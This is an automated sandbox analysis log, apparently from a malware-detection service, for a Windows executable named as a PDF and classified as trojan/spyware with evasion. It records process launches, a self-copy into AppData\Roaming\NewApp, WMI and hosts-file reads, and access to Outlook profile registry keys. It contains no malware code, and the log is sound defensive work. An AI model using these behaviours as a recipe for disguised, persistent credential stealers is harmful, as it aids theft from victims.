                      Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 276
                      Source: 0603321WG_0_1 pdf.exe Static PE information: invalid certificate
                      Source: 0603321WG_0_1 pdf.exe Binary or memory string: OriginalFilename vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.674955398.0000000004485000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.672052071.00000000032A9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameJcue ESf.exe2 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.684283950.00000000059F0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.684283950.00000000059F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.684453359.0000000005C10000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000000.643196446.0000000000812000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUAudJRAa.exe2 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.683795735.0000000005150000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000000.00000002.684560546.0000000005DB0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe Binary or memory string: OriginalFilename vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.920216690.0000000005C60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912069890.0000000000FC0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.909029563.0000000000402000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameJcue ESf.exe2 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.912313952.0000000001030000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamewshom.ocx.mui vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe, 00000007.00000002.909531429.00000000007C2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUAudJRAa.exe2 vs 0603321WG_0_1 pdf.exe
                      Source: 0603321WG_0_1 pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp Binary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb1
                      Source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@27/14@4/3
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe File created: C:\Users\user\AppData\Roaming\NewApp
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7056
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_01
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7004
                      Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4972
                      Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD18D.tmp
                      Source: 0603321WG_0_1 pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: 0603321WG_0_1 pdf.exe ReversingLabs: Detection: 21%
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe File read: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                      Source: unknown Process created: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe 'C:\Users\user\Desktop\0603321WG_0_1 pdf.exe'
                      Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknown Process created: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                      Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 276
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe 'C:\Users\user\AppData\Roaming\NewApp\NewApp.exe'
                      Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknown Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1464
                      Source: unknown Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 1896
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Process created: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe C:\Users\user\Desktop\0603321WG_0_1 pdf.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe Process created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\0603321WG_0_1 pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: 0603321WG_0_1 pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 0603321WG_0_1 pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829638034.0000000004DE4000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdbse$je source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbOe@j source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000A.00000003.685883855.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.829603052.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbYX&n source: NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbF source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\Desktop\0603321WG_0_1 pdf.PDB source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670154182.00000000009A7000.00000004.00000010.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdbUe:jC source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670979775.0000000000EE5000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\0603321WG_0_1 pdf.PDB13 source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: CLBCatQ.pdb4 source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000001F.00000003.829019707.0000000004DF3000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb< source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb;^ source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdbL source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000A.00000003.685719663.0000000005021000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.829119339.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831487010.0000000005791000.00000004.00000001.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbW% source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbN source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: psapi.pdb#N source: WerFault.exe, 0000001F.00000003.829483729.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670942444.0000000000EBA000.00000004.00000020.sdmp
                      Source: Binary string: iertutil.pdbP source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb] source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbK source: NewApp.exe, 0000000F.00000002.810619163.0000000001557000.00000004.00000020.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000001F.00000003.829638034.0000000004DE4000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdb^ source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
                      Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdbd source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdbIeNj source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp
                      Source: Binary string: rasadhlp.pdb. source: WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp
                      Source: Binary string: edputil.pdbCeTj source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828826066.0000000004DEB000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbae6je source: WerFault.exe, 0000000A.00000003.685611457.000000000518B000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: 0603321WG_0_1 pdf.exe, 00000000.00000002.670963897.0000000000ED2000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.810490743.000000000088A000.00000004.00000020.sdmp, WerFault.exe, 0000001F.00000002.901213367.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbv source: WerFault.exe, 00000020.00000003.831025408.000000000576B000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb>Y source: NewApp.exe, 0000000F.00000002.809881079.00000000014CF000.00000004.00000020.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.685673735.0000000005187000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.828975813.0000000004DE7000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.832350395.0000000005767000.00000004.00000040.sdmp
